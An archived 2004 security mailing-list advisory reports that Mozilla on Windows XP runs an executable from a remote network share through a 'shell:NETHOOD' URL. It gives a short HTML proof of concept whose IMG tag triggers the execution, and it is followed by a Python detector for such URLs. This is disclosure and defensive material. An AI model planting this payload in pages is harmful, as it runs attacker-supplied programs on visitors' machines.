MOZILLA: SHELL can execute remote EXE program

liudieyu_at_umbrella.name
Date: 07/09/04

    To: <bugtraq@securityfocus.com>, <NTBugtraq@listserv.ntbugtraq.com>, <full-disclosure@lists.netsys.com>
    Date: Fri, 9 Jul 2004 02:43:30 -0000
    
    

    SUBJ: MOZILLA: SHELL can execute remote EXE program
    DATE: 2004/07/09
    FROM: Liu Die Yu <liudieyu AT umbrella D0T name>
    ############################################################
    [START] Advisory
    ############################################################

    COPYRIGHT
    ---------
    This Advisory is Copyright (c) 2004 "Liu Die Yu".
    You may distribute it unmodified.
    You may not modify it and distribute it or distribute parts of it without the
    author's written permission.
    ( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )

    TESTED
    ------
    MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
    running on winxp.en.home.sp1a.up2date.20040709

    PROCESS
    -------
    VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
    THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
    "shell:NETHOOD"

    AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
    shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe

    A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.

    REFERENCE
    ---------
    MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
    http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
    greetingz fly to perrymonj.

    WINDOWS supports "shell:NETHOOD":
    http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
    thanks to malware for his additional research, and Cheng Peng Su for his
    original discovery.

    liudieyu

    http://umbrella.name

    ############################################################
    [START] PROOF OF CONCEPT
    ############################################################
    <!--
    MOZILLA REMOTE COMPROMISE DEMO

    REPLACE "[" WITH "<", and REPLACE "]" WITH ">".

    !!!!! WARNING !!!!!
    THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.

    PROCESS:
    1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
    "X-6487ohu4s6x0p".
            THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER
    AT "shell:NETHOOD"
    2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
    "shared" FOLDER.

    CREATED BY:
    "Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME

    COPYRIGHT:
    This Demo is Copyright (c) 2004 "Liu Die Yu".
    You may distribute it unmodified.
    You may not modify it and distribute it or distribute parts of it without the
    author's written permission.
    ( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
    -->

    [IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]
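
A defender-side check for the pattern this advisory relies on, a `shell:` URL in a URL-bearing HTML attribute, as an added example that is not part of the original post. The attribute list, the function and class names, and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes that make a browser load or navigate to a URL (assumed list).
URL_ATTRS = {"src", "href", "data", "action", "background", "lowsrc"}
# Only "shell" comes from the advisory; extend per local policy.
BLOCKED_SCHEMES = {"shell"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.IGNORECASE)
LEADING_JUNK = "".join(chr(c) for c in range(0x21))  # C0 controls and space

# Constructed sample page; share and file names are placeholders.
SAMPLE = r'''<html><body>
<img src="logo.png">
<IMG SRC="shell:NETHOOD\example share\placeholder.exe">
<a href=" &#x53;hell:NETHOOD\x">link</a>
<a href="http://example.org/shell:notascheme">ok</a>
</body></html>'''


def url_scheme(value):
    """Return the lower-cased URL scheme of an attribute value, or None."""
    # Browsers drop tab/CR/LF inside a URL and ignore leading whitespace,
    # so normalise the same way before looking for the scheme.
    cleaned = re.sub(r"[\t\r\n]", "", value).lstrip(LEADING_JUNK)
    match = SCHEME_RE.match(cleaned)
    return match.group(1).lower() if match else None


class ShellUrlFinder(HTMLParser):
    """Collects (line, tag, attribute, value) for blocked-scheme URLs."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        line, _ = self.getpos()
        # HTMLParser has already lower-cased names and decoded entities.
        for name, value in attrs:
            if name in URL_ATTRS and value and url_scheme(value) in BLOCKED_SCHEMES:
                self.findings.append((line, tag, name, value))


def find_shell_urls(html_text):
    finder = ShellUrlFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings
```

Run over the constructed sample, `find_shell_urls(SAMPLE)` reports the `IMG` on line 3 and the entity-encoded link on line 4, and ignores the `http:` URL that merely contains the text `shell:` in its path.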

